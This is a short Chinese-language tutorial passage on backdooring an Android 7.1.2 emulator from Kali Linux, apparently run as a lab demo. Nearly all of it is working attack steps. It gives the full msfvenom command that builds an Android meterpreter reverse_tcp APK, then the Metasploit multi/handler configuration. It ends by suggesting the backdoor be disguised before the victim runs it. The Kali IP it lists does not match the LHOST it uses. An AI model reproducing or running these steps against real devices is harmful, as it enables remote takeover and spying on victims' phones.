二、演示环境
kali ip: 192.168.249.137
夜神模拟器 Android7.1.2
三、渗透过程
1.使用root权限
su root
2.生成可执行后门文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.249.130 LPORT=5555 R >Android.apk
LHOST的IP写自己kali的ip,LPORT选一个没占用的端口,apk的名字自定义
运行代码生成文件
3.将生成的后门文件,放入靶机
4. 运行msfconsole命令
5.参数配置
use exploit/multi/handler (选择模块)
set payload android/meterpreter/reverse_tcp (选择攻击模块)
set LhOST 192.168.249.130 (本地ip)
set lport 5555 (端口)
参数配置完成,查看配置
show options
exploit 运行
6.在靶机运行后门程序
我们可以把这个程序伪装一下